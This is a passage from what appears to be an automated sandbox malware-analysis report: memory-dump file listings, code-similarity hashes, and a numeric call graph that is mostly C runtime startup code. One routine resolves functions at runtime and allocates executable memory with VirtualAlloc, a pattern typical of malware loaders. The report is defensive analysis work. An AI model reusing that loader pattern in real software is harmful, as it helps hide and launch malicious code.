                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00852756
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                  • String ID:
                                  • API String ID: 677527491-0
                                  • Opcode ID: 8c8e36cf63a23c8c75629523c62fbb1de5df3b63cd50c18d5e4472e6582cd9ba
                                  • Instruction ID: 4886e13da41a5c6d88342e185c33a9b43a8c32aa7615aa47a3dc4125dd0ffca0
                                  • Opcode Fuzzy Hash: 8c8e36cf63a23c8c75629523c62fbb1de5df3b63cd50c18d5e4472e6582cd9ba
                                  • Instruction Fuzzy Hash: 0101DF76A002108FCB0AEB28C84153E7BB1FFCA751B184009EC1597381CF34AE4ADBC6

                                  Execution Graph

                                  Execution Coverage:3.5%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:1.5%
                                  Total number of Nodes:1514
                                  Total number of Limit Nodes:16
                                  execution_graph 13584 4e4549 13585 4e4555 __FrameHandler3::FrameUnwindToState 13584->13585 13610 4e4881 13585->13610 13587 4e455c 13588 4e46b5 13587->13588 13597 4e4586 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 13587->13597 13659 4e4d66 IsProcessorFeaturePresent 13588->13659 13590 4e46bc 13638 4ec22a 13590->13638 13595 4e45a5 13596 4e4626 13618 4ebe68 13596->13618 13597->13595 13597->13596 13641 4ec204 13597->13641 13600 4e462c 13622 4fc25d 13600->13622 13605 4e4651 13606 4e465a 13605->13606 13650 4ec1df 13605->13650 13653 4e49f2 13606->13653 13611 4e488a 13610->13611 13666 4e4a8c IsProcessorFeaturePresent 13611->13666 13615 4e489b 13616 4e489f 13615->13616 13676 4e77fd 13615->13676 13616->13587 13619 4ebe71 13618->13619 13621 4ebe76 13618->13621 13736 4ebbc2 13619->13736 13621->13600 14395 4e10d0 13622->14395 13624 4fc27e GetModuleHandleA 14403 4e163e 13624->14403 13626 4fc29a _strlen 14407 4e1c44 13626->14407 13628 4fc2b0 _strlen 13629 4e1c44 std::ios_base::_Init 43 API calls 13628->13629 13630 4fc2c6 GetProcAddress 13629->13630 13631 4fc2e1 13630->13631 14411 4fc1f7 VirtualAlloc 13631->14411 13633 4fc2e6 14416 4e1bea 13633->14416 13635 4fc2ee 13636 4e4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13635->13636 13637 4e4643 13636->13637 13648 4e4e80 GetModuleHandleW 13637->13648 14677 4ec012 13638->14677 13642 4edf7a __FrameHandler3::FrameUnwindToState 13641->13642 13643 4ec21a std::_Locinfo::_Locinfo_dtor 13641->13643 13644 4eea50 __Getctype 41 API calls 13642->13644 13643->13596 13647 4edf8b 13644->13647 13645 4eaff7 __FrameHandler3::FrameUnwindToState 41 API calls 13646 4edfb5 13645->13646 13647->13645 13649 4e464d 13648->13649 13649->13590 13649->13605 13651 4ec012 __FrameHandler3::FrameUnwindToState 23 API calls 13650->13651 13652 4ec1ea 13651->13652 13652->13606 13654 4e49fe 13653->13654 13655 4e4663 13654->13655 14754 4edeeb 13654->14754 13655->13595 13657 4e4a0c 13658 4e77fd ___scrt_uninitialize_crt 7 API calls 13657->13658 13658->13655 13660 4e4d7c __fread_nolock __FrameHandler3::FrameUnwindToState 13659->13660 13661 4e4e27 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13660->13661 13662 4e4e6b __FrameHandler3::FrameUnwindToState 13661->13662 13662->13590 13663 4ec1ee 13664 4ec012 __FrameHandler3::FrameUnwindToState 23 API calls 13663->13664 13665 4e46ca 13664->13665 13667 4e4896 13666->13667 13668 4e77de 13667->13668 13682 4e88b7 13668->13682 13672 4e77fa 13672->13615 13673 4e77ef 13673->13672 13696 4e88f3 13673->13696 13675 4e77e7 13675->13615 13677 4e7806 13676->13677 13678 4e7810 13676->13678 13679 4e7976 ___vcrt_uninitialize_ptd 6 API calls 13677->13679 13678->13616 13680 4e780b 13679->13680 13681 4e88f3 ___vcrt_uninitialize_locks DeleteCriticalSection 13680->13681 13681->13678 13683 4e88c0 13682->13683 13685 4e88e9 13683->13685 13686 4e77e3 13683->13686 13700 4e8afc 13683->13700 13687 4e88f3 ___vcrt_uninitialize_locks DeleteCriticalSection 13685->13687 13686->13675 13688 4e7943 13686->13688 13687->13686 13717 4e8a0d 13688->13717 13691 4e7958 13691->13673 13694 4e7973 13694->13673 13697 4e891d 13696->13697 13698 4e88fe 13696->13698 13697->13675 13699 4e8908 DeleteCriticalSection 13698->13699 13699->13697 13699->13699 13705 4e8922 13700->13705 13703 4e8b34 InitializeCriticalSectionAndSpinCount 13704 4e8b1f 13703->13704 13704->13683 13706 4e893f 13705->13706 13709 4e8943 13705->13709 13706->13703 13706->13704 13707 4e89ab GetProcAddress 13707->13706 13709->13706 13709->13707 13710 4e899c 13709->13710 13712 4e89c2 LoadLibraryExW 13709->13712 13710->13707 13711 4e89a4 FreeLibrary 13710->13711 13711->13707 13713 4e8a09 13712->13713 13714 4e89d9 GetLastError 13712->13714 13713->13709 13714->13713 13715 4e89e4 ___vcrt_FlsGetValue 13714->13715 13715->13713 13716 4e89fa LoadLibraryExW 13715->13716 13716->13709 13718 4e8922 ___vcrt_FlsGetValue 5 API calls 13717->13718 13719 4e8a27 13718->13719 13720 4e8a40 TlsAlloc 13719->13720 13721 4e794d 13719->13721 13721->13691 13722 4e8abe 13721->13722 13723 4e8922 ___vcrt_FlsGetValue 5 API calls 13722->13723 13724 4e8ad8 13723->13724 13725 4e8af3 TlsSetValue 13724->13725 13726 4e7966 13724->13726 13725->13726 13726->13694 13727 4e7976 13726->13727 13728 4e7986 13727->13728 13729 4e7980 13727->13729 13728->13691 13731 4e8a48 13729->13731 13732 4e8922 ___vcrt_FlsGetValue 5 API calls 13731->13732 13733 4e8a62 13732->13733 13734 4e8a7a TlsFree 13733->13734 13735 4e8a6e 13733->13735 13734->13735 13735->13728 13737 4ebbe1 13736->13737 13738 4ebbcb 13736->13738 13737->13621 13738->13737 13742 4ebbee 13738->13742 13740 4ebbd8 13740->13737 13759 4ebd59 13740->13759 13743 4ebbfa 13742->13743 13744 4ebbf7 13742->13744 13767 4f4ca4 13743->13767 13744->13740 13749 4ebc0b 13794 4eed98 13749->13794 13750 4ebc17 13800 4ebc48 13750->13800 13755 4eed98 ___free_lconv_mon 14 API calls 13756 4ebc3b 13755->13756 13757 4eed98 ___free_lconv_mon 14 API calls 13756->13757 13758 4ebc41 13757->13758 13758->13740 13760 4ebdca 13759->13760 13766 4ebd68 13759->13766 13760->13737 13761 4eed3b __dosmaperr 14 API calls 13761->13766 13762 4ebdce 13763 4eed98 ___free_lconv_mon 14 API calls 13762->13763 13763->13760 13764 4f3bf4 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 13764->13766 13765 4eed98 ___free_lconv_mon 14 API calls 13765->13766 13766->13760 13766->13761 13766->13762 13766->13764 13766->13765 13768 4f4cad 13767->13768 13769 4ebc00 13767->13769 13822 4eeb0b 13768->13822 13773 4f4fa6 GetEnvironmentStringsW 13769->13773 13774 4f4fbe 13773->13774 13775 4ebc05 13773->13775 13776 4f3bf4 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13774->13776 13775->13749 13775->13750 13777 4f4fdb 13776->13777 13778 4f4fe5 FreeEnvironmentStringsW 13777->13778 13779 4f4ff0 13777->13779 13778->13775 13780 4f1dc1 __fread_nolock 15 API calls 13779->13780 13781 4f4ff7 13780->13781 13782 4f4fff 13781->13782 13783 4f5010 13781->13783 13784 4eed98 ___free_lconv_mon 14 API calls 13782->13784 13785 4f3bf4 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13783->13785 13786 4f5004 FreeEnvironmentStringsW 13784->13786 13787 4f5020 13785->13787 13786->13775 13788 4f502f 13787->13788 13789 4f5027 13787->13789 13791 4eed98 ___free_lconv_mon 14 API calls 13788->13791 13790 4eed98 ___free_lconv_mon 14 API calls 13789->13790 13792 4f502d FreeEnvironmentStringsW 13790->13792 13791->13792 13792->13775 13795 4eeda3 HeapFree 13794->13795 13799 4ebc11 13794->13799 13796 4eedb8 GetLastError 13795->13796 13795->13799 13797 4eedc5 __dosmaperr 13796->13797 13798 4eb0d8 __dosmaperr 12 API calls 13797->13798 13798->13799 13799->13740 13801 4ebc5d 13800->13801 13802 4eed3b __dosmaperr 14 API calls 13801->13802 13803 4ebc84 13802->13803 13804 4ebc8c 13803->13804 13813 4ebc96 13803->13813 13805 4eed98 ___free_lconv_mon 14 API calls 13804->13805 13821 4ebc1e 13805->13821 13806 4ebcf3 13807 4eed98 ___free_lconv_mon 14 API calls 13806->13807 13807->13821 13808 4eed3b __dosmaperr 14 API calls 13808->13813 13809 4ebd02 14385 4ebd2a 13809->14385 13813->13806 13813->13808 13813->13809 13815 4ebd1d 13813->13815 13817 4eed98 ___free_lconv_mon 14 API calls 13813->13817 14376 4edfb6 13813->14376 13814 4eed98 ___free_lconv_mon 14 API calls 13816 4ebd0f 13814->13816 14391 4e8efc IsProcessorFeaturePresent 13815->14391 13819 4eed98 ___free_lconv_mon 14 API calls 13816->13819 13817->13813 13819->13821 13820 4ebd29 13821->13755 13823 4eeb1c 13822->13823 13824 4eeb16 13822->13824 13828 4eeb22 13823->13828 13878 4ef2c3 13823->13878 13873 4ef284 13824->13873 13833 4eeb27 13828->13833 13895 4eaff7 13828->13895 13829 4eeb3a 13883 4eed3b 13829->13883 13850 4f4aaf 13833->13850 13835 4eeb4e 13838 4ef2c3 __dosmaperr 6 API calls 13835->13838 13836 4eeb63 13837 4ef2c3 __dosmaperr 6 API calls 13836->13837 13840 4eeb6f 13837->13840 13839 4eeb5a 13838->13839 13843 4eed98 ___free_lconv_mon 14 API calls 13839->13843 13841 4eeb82 13840->13841 13842 4eeb73 13840->13842 13890 4ee87e 13841->13890 13844 4ef2c3 __dosmaperr 6 API calls 13842->13844 13846 4eeb60 13843->13846 13844->13839 13846->13828 13848 4eed98 ___free_lconv_mon 14 API calls 13849 4eeb94 13848->13849 13849->13833 14176 4f4c04 13850->14176 13857 4f4b0b 13860 4eed98 ___free_lconv_mon 14 API calls 13857->13860 13858 4f4b19 14203 4f4cff 13858->14203 13862 4f4af2 13860->13862 13862->13769 13863 4f4b51 13864 4eb0d8 __dosmaperr 14 API calls 13863->13864 13865 4f4b56 13864->13865 13868 4eed98 ___free_lconv_mon 14 API calls 13865->13868 13866 4f4b98 13867 4f4be1 13866->13867 14214 4f4721 13866->14214 13871 4eed98 ___free_lconv_mon 14 API calls 13867->13871 13868->13862 13869 4f4b6c 13869->13866 13872 4eed98 ___free_lconv_mon 14 API calls 13869->13872 13871->13862 13872->13866 13906 4ef073 13873->13906 13876 4ef2bb TlsGetValue 13877 4ef2a9 13877->13823 13879 4ef073 std::_Locinfo::_Locinfo_dtor 5 API calls 13878->13879 13880 4ef2df 13879->13880 13881 4ef2fd TlsSetValue 13880->13881 13882 4eeb36 13880->13882 13882->13828 13882->13829 13888 4eed48 __dosmaperr 13883->13888 13884 4eed88 13924 4eb0d8 13884->13924 13885 4eed73 HeapAlloc 13886 4eeb46 13885->13886 13885->13888 13886->13835 13886->13836 13888->13884 13888->13885 13921 4eda13 13888->13921 13961 4ee712 13890->13961 14063 4f2d4a 13895->14063 13898 4eb007 13900 4eb011 IsProcessorFeaturePresent 13898->13900 13905 4eb030 13898->13905 13902 4eb01d 13900->13902 13901 4ec1ee __FrameHandler3::FrameUnwindToState 23 API calls 13904 4eb03a 13901->13904 14093 4e8cd3 13902->14093 13905->13901 13907 4ef0a1 13906->13907 13911 4ef09d 13906->13911 13907->13911 13913 4eefa8 13907->13913 13910 4ef0bb GetProcAddress 13910->13911 13912 4ef0cb std::_Locinfo::_Locinfo_dtor 13910->13912 13911->13876 13911->13877 13912->13911 13919 4eefb9 ___vcrt_FlsGetValue 13913->13919 13914 4ef04f 13914->13910 13914->13911 13915 4eefd7 LoadLibraryExW 13916 4ef056 13915->13916 13917 4eeff2 GetLastError 13915->13917 13916->13914 13918 4ef068 FreeLibrary 13916->13918 13917->13919 13918->13914 13919->13914 13919->13915 13920 4ef025 LoadLibraryExW 13919->13920 13920->13916 13920->13919 13927 4eda40 13921->13927 13938 4eeba1 GetLastError 13924->13938 13926 4eb0dd 13926->13886 13928 4eda4c __FrameHandler3::FrameUnwindToState 13927->13928 13933 4ea676 EnterCriticalSection 13928->13933 13930 4eda57 13934 4eda93 13930->13934 13933->13930 13937 4ea6be LeaveCriticalSection 13934->13937 13936 4eda1e 13936->13888 13937->13936 13939 4eebb7 13938->13939 13940 4eebbd 13938->13940 13941 4ef284 __dosmaperr 6 API calls 13939->13941 13942 4ef2c3 __dosmaperr 6 API calls 13940->13942 13944 4eebc1 SetLastError 13940->13944 13941->13940 13943 4eebd9 13942->13943 13943->13944 13946 4eed3b __dosmaperr 12 API calls 13943->13946 13944->13926 13947 4eebee 13946->13947 13948 4eebf6 13947->13948 13949 4eec07 13947->13949 13950 4ef2c3 __dosmaperr 6 API calls 13948->13950 13951 4ef2c3 __dosmaperr 6 API calls 13949->13951 13952 4eec04 13950->13952 13953 4eec13 13951->13953 13957 4eed98 ___free_lconv_mon 12 API calls 13952->13957 13954 4eec2e 13953->13954 13955 4eec17 13953->13955 13958 4ee87e __dosmaperr 12 API calls 13954->13958 13956 4ef2c3 __dosmaperr 6 API calls 13955->13956 13956->13952 13957->13944 13959 4eec39 13958->13959 13960 4eed98 ___free_lconv_mon 12 API calls 13959->13960 13960->13944 13962 4ee71e __FrameHandler3::FrameUnwindToState 13961->13962 13975 4ea676 EnterCriticalSection 13962->13975 13964 4ee728 13976 4ee758 13964->13976 13967 4ee824 13968 4ee830 __FrameHandler3::FrameUnwindToState 13967->13968 13980 4ea676 EnterCriticalSection 13968->13980 13970 4ee83a 13981 4eea05 13970->13981 13972 4ee852 13985 4ee872 13972->13985 13975->13964 13979 4ea6be LeaveCriticalSection 13976->13979 13978 4ee746 13978->13967 13979->13978 13980->13970 13982 4eea14 __Getctype 13981->13982 13984 4eea3b __Getctype 13981->13984 13982->13984 13988 4f63ee 13982->13988 13984->13972 14062 4ea6be LeaveCriticalSection 13985->14062 13987 4ee860 13987->13848 13990 4f646e 13988->13990 13991 4f6404 13988->13991 13993 4eed98 ___free_lconv_mon 14 API calls 13990->13993 14015 4f64bc 13990->14015 13991->13990 13996 4f6437 13991->13996 13999 4eed98 ___free_lconv_mon 14 API calls 13991->13999 13992 4f64ca 14003 4f652a 13992->14003 14012 4eed98 14 API calls ___free_lconv_mon 13992->14012 13994 4f6490 13993->13994 13995 4eed98 ___free_lconv_mon 14 API calls 13994->13995 13997 4f64a3 13995->13997 14000 4eed98 ___free_lconv_mon 14 API calls 13996->14000 14014 4f6459 13996->14014 14001 4eed98 ___free_lconv_mon 14 API calls 13997->14001 13998 4eed98 ___free_lconv_mon 14 API calls 14002 4f6463 13998->14002 14004 4f642c 13999->14004 14005 4f644e 14000->14005 14006 4f64b1 14001->14006 14007 4eed98 ___free_lconv_mon 14 API calls 14002->14007 14008 4eed98 ___free_lconv_mon 14 API calls 14003->14008 14016 4f56a4 14004->14016 14044 4f5b58 14005->14044 14011 4eed98 ___free_lconv_mon 14 API calls 14006->14011 14007->13990 14013 4f6530 14008->14013 14011->14015 14012->13992 14013->13984 14014->13998 14056 4f655f 14015->14056 14017 4f56b5 14016->14017 14043 4f579e 14016->14043 14018 4f56c6 14017->14018 14019 4eed98 ___free_lconv_mon 14 API calls 14017->14019 14020 4f56d8 14018->14020 14021 4eed98 ___free_lconv_mon 14 API calls 14018->14021 14019->14018 14022 4f56ea 14020->14022 14023 4eed98 ___free_lconv_mon 14 API calls 14020->14023 14021->14020 14024 4f56fc 14022->14024 14025 4eed98 ___free_lconv_mon 14 API calls 14022->14025 14023->14022 14026 4eed98 ___free_lconv_mon 14 API calls 14024->14026 14030 4f570e 14024->14030 14025->14024 14026->14030 14027 4f5720 14029 4f5732 14027->14029 14031 4eed98 ___free_lconv_mon 14 API calls 14027->14031 14028 4eed98 ___free_lconv_mon 14 API calls 14028->14027 14032 4f5744 14029->14032 14033 4eed98 ___free_lconv_mon 14 API calls 14029->14033 14030->14027 14030->14028 14031->14029 14034 4f5756 14032->14034 14035 4eed98 ___free_lconv_mon 14 API calls 14032->14035 14033->14032 14036 4f5768 14034->14036 14037 4eed98 ___free_lconv_mon 14 API calls 14034->14037 14035->14034 14038 4f577a 14036->14038 14039 4eed98 ___free_lconv_mon 14 API calls 14036->14039 14037->14036 14040 4f578c 14038->14040 14041 4eed98 ___free_lconv_mon 14 API calls 14038->14041 14039->14038 14042 4eed98 ___free_lconv_mon 14 API calls 14040->14042 14040->14043 14041->14040 14042->14043 14043->13996 14045 4f5b65 14044->14045 14055 4f5bbd 14044->14055 14046 4f5b75 14045->14046 14047 4eed98 ___free_lconv_mon 14 API calls 14045->14047 14048 4eed98 ___free_lconv_mon 14 API calls 14046->14048 14049 4f5b87 14046->14049 14047->14046 14048->14049 14051 4f5b99 14049->14051 14052 4eed98 ___free_lconv_mon 14 API calls 14049->14052 14050 4f5bab 14054 4eed98 ___free_lconv_mon 14 API calls 14050->14054 14050->14055 14051->14050 14053 4eed98 ___free_lconv_mon 14 API calls 14051->14053 14052->14051 14053->14050 14054->14055 14055->14014 14057 4f658b 14056->14057 14058 4f656c 14056->14058 14057->13992 14058->14057 14059 4f6073 __Getctype 14 API calls 14058->14059 14060 4f6585 14059->14060 14061 4eed98 ___free_lconv_mon 14 API calls 14060->14061 14061->14057 14062->13987 14099 4f2c7c 14063->14099 14066 4f2d8f 14067 4f2d9b __FrameHandler3::FrameUnwindToState 14066->14067 14068 4f2dc2 __FrameHandler3::FrameUnwindToState 14067->14068 14069 4eeba1 __dosmaperr 14 API calls 14067->14069 14075 4f2dc8 __FrameHandler3::FrameUnwindToState 14067->14075 14070 4f2e0f 14068->14070 14068->14075 14092 4f2df9 14068->14092 14069->14068 14071 4eb0d8 __dosmaperr 14 API calls 14070->14071 14072 4f2e14 14071->14072 14110 4e8ecf 14072->14110 14074 4f2e3b 14077 4f2f6e 14074->14077 14078 4f2e7d 14074->14078 14089 4f2eac 14074->14089 14075->14074 14113 4ea676 EnterCriticalSection 14075->14113 14081 4f2f79 14077->14081 14145 4ea6be LeaveCriticalSection 14077->14145 14078->14089 14114 4eea50 GetLastError 14078->14114 14083 4ec1ee __FrameHandler3::FrameUnwindToState 23 API calls 14081->14083 14085 4f2f81 14083->14085 14086 4eea50 __Getctype 41 API calls 14090 4f2f01 14086->14090 14088 4eea50 __Getctype 41 API calls 14088->14089 14141 4f2f1b 14089->14141 14091 4eea50 __Getctype 41 API calls 14090->14091 14090->14092 14091->14092 14092->13898 14094 4e8cef __fread_nolock __FrameHandler3::FrameUnwindToState 14093->14094 14095 4e8d1b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14094->14095 14096 4e8dec __FrameHandler3::FrameUnwindToState 14095->14096 14168 4e4713 14096->14168 14098 4e8e0a 14098->13905 14100 4f2c88 __FrameHandler3::FrameUnwindToState 14099->14100 14105 4ea676 EnterCriticalSection 14100->14105 14102 4f2c96 14106 4f2cd4 14102->14106 14105->14102 14109 4ea6be LeaveCriticalSection 14106->14109 14108 4eaffc 14108->13898 14108->14066 14109->14108 14146 4e8e1b 14110->14146 14113->14074 14115 4eea66 14114->14115 14118 4eea6c 14114->14118 14116 4ef284 __dosmaperr 6 API calls 14115->14116 14116->14118 14117 4ef2c3 __dosmaperr 6 API calls 14119 4eea88 14117->14119 14118->14117 14138 4eea70 SetLastError 14118->14138 14121 4eed3b __dosmaperr 14 API calls 14119->14121 14119->14138 14124 4eea9d 14121->14124 14122 4eeb05 14125 4eaff7 __FrameHandler3::FrameUnwindToState 39 API calls 14122->14125 14123 4eeb00 14123->14088 14126 4eeab6 14124->14126 14127 4eeaa5 14124->14127 14129 4eeb0a 14125->14129 14128 4ef2c3 __dosmaperr 6 API calls 14126->14128 14130 4ef2c3 __dosmaperr 6 API calls 14127->14130 14131 4eeac2 14128->14131 14132 4eeab3 14130->14132 14133 4eeadd 14131->14133 14134 4eeac6 14131->14134 14136 4eed98 ___free_lconv_mon 14 API calls 14132->14136 14137 4ee87e __dosmaperr 14 API calls 14133->14137 14135 4ef2c3 __dosmaperr 6 API calls 14134->14135 14135->14132 14136->14138 14139 4eeae8 14137->14139 14138->14122 14138->14123 14140 4eed98 ___free_lconv_mon 14 API calls 14139->14140 14140->14138 14142 4f2f21 14141->14142 14144 4f2ef2 14141->14144 14167 4ea6be LeaveCriticalSection 14142->14167 14144->14086 14144->14090 14144->14092 14145->14081 14147 4e8e2d _Fputc 14146->14147 14152 4e8e52 14147->14152 14153 4e8e69 14152->14153 14154 4e8e62 14152->14154 14156 4e8c47 _Fputc GetLastError SetLastError 14153->14156 14160 4e8e45 14153->14160 14155 4e8c70 _Fputc 16 API calls 14154->14155 14155->14153 14157 4e8e9e 14156->14157 14158 4e8efc __Getctype 11 API calls 14157->14158 14157->14160 14159 4e8ece 14158->14159 14161 4e8c0b 14160->14161 14162 4e8c17 14161->14162 14163 4e8c2e 14162->14163 14164 4e8cb6 _Fputc 41 API calls 14162->14164 14165 4e8cb6 _Fputc 41 API calls 14163->14165 14166 4e8c41 14163->14166 14164->14163 14165->14166 14166->14092 14167->14144 14169 4e471c IsProcessorFeaturePresent 14168->14169 14170 4e471b 14168->14170 14172 4e5036 14169->14172 14170->14098 14175 4e4ff9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14172->14175 14174 4e5119 14174->14098 14175->14174 14177 4f4c10 __FrameHandler3::FrameUnwindToState 14176->14177 14184 4f4c2a 14177->14184 14222 4ea676 EnterCriticalSection 14177->14222 14180 4eaff7 __FrameHandler3::FrameUnwindToState 41 API calls 14185 4f4ca3 14180->14185 14181 4f4ad9 14187 4f482f 14181->14187 14182 4f4c3a 14183 4f4c66 14182->14183 14186 4eed98 ___free_lconv_mon 14 API calls 14182->14186 14223 4f4c83 14183->14223 14184->14180 14184->14181 14186->14183 14227 4eb0eb 14187->14227 14190 4f4862 14192 4f4879 14190->14192 14193 4f4867 GetACP 14190->14193 14191 4f4850 GetOEMCP 14191->14192 14192->13862 14194 4f1dc1 14192->14194 14193->14192 14195 4f1dff 14194->14195 14196 4f1dcf 14194->14196 14197 4eb0d8 __dosmaperr 14 API calls 14195->14197 14198 4f1dea HeapAlloc 14196->14198 14201 4f1dd3 __dosmaperr 14196->14201 14200 4f1e04 14197->14200 14199 4f1dfd 14198->14199 14198->14201 14199->14200 14200->13857 14200->13858 14201->14195 14201->14198 14202 4eda13 ctype 2 API calls 14201->14202 14202->14201 14204 4f482f 43 API calls 14203->14204 14205 4f4d1f 14204->14205 14206 4f4d5c IsValidCodePage 14205->14206 14211 4f4d98 __fread_nolock 14205->14211 14208 4f4d6e 14206->14208 14206->14211 14207 4e4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14209 4f4b46 14207->14209 14210 4f4d9d GetCPInfo 14208->14210 14213 4f4d77 __fread_nolock 14208->14213 14209->13863 14209->13869 14210->14211 14210->14213 14211->14207 14269 4f4903 14213->14269 14215 4f472d __FrameHandler3::FrameUnwindToState 14214->14215 14350 4ea676 EnterCriticalSection 14215->14350 14217 4f4737 14351 4f476e 14217->14351 14222->14182 14226 4ea6be LeaveCriticalSection 14223->14226 14225 4f4c8a 14225->14184 14226->14225 14228 4eb109 14227->14228 14229 4eb102 14227->14229 14228->14229 14230 4eea50 __Getctype 41 API calls 14228->14230 14229->14190 14229->14191 14231 4eb12a 14230->14231 14235 4f24ba 14231->14235 14236 4f24cd 14235->14236 14237 4eb140 14235->14237 14236->14237 14243 4f663a 14236->14243 14239 4f2518 14237->14239 14240 4f252b 14239->14240 14241 4f2540 14239->14241 14240->14241 14264 4f4cec 14240->14264 14241->14229 14244 4f6646 __FrameHandler3::FrameUnwindToState 14243->14244 14245 4eea50 __Getctype 41 API calls 14244->14245 14246 4f664f 14245->14246 14253 4f6695 14246->14253 14256 4ea676 EnterCriticalSection 14246->14256 14248 4f666d 14257 4f66bb 14248->14257 14253->14237 14254 4eaff7 __FrameHandler3::FrameUnwindToState 41 API calls 14255 4f66ba 14254->14255 14256->14248 14258 4f66c9 __Getctype 14257->14258 14260 4f667e 14257->14260 14259 4f63ee __Getctype 14 API calls 14258->14259 14258->14260 14259->14260 14261 4f669a 14260->14261 14262 4ea6be std::_Lockit::~_Lockit LeaveCriticalSection 14261->14262 14263 4f6691 14262->14263 14263->14253 14263->14254 14265 4eea50 __Getctype 41 API calls 14264->14265 14266 4f4cf1 14265->14266 14267 4f4c04 __strnicoll 41 API calls 14266->14267 14268 4f4cfc 14267->14268 14268->14241 14270 4f492b GetCPInfo 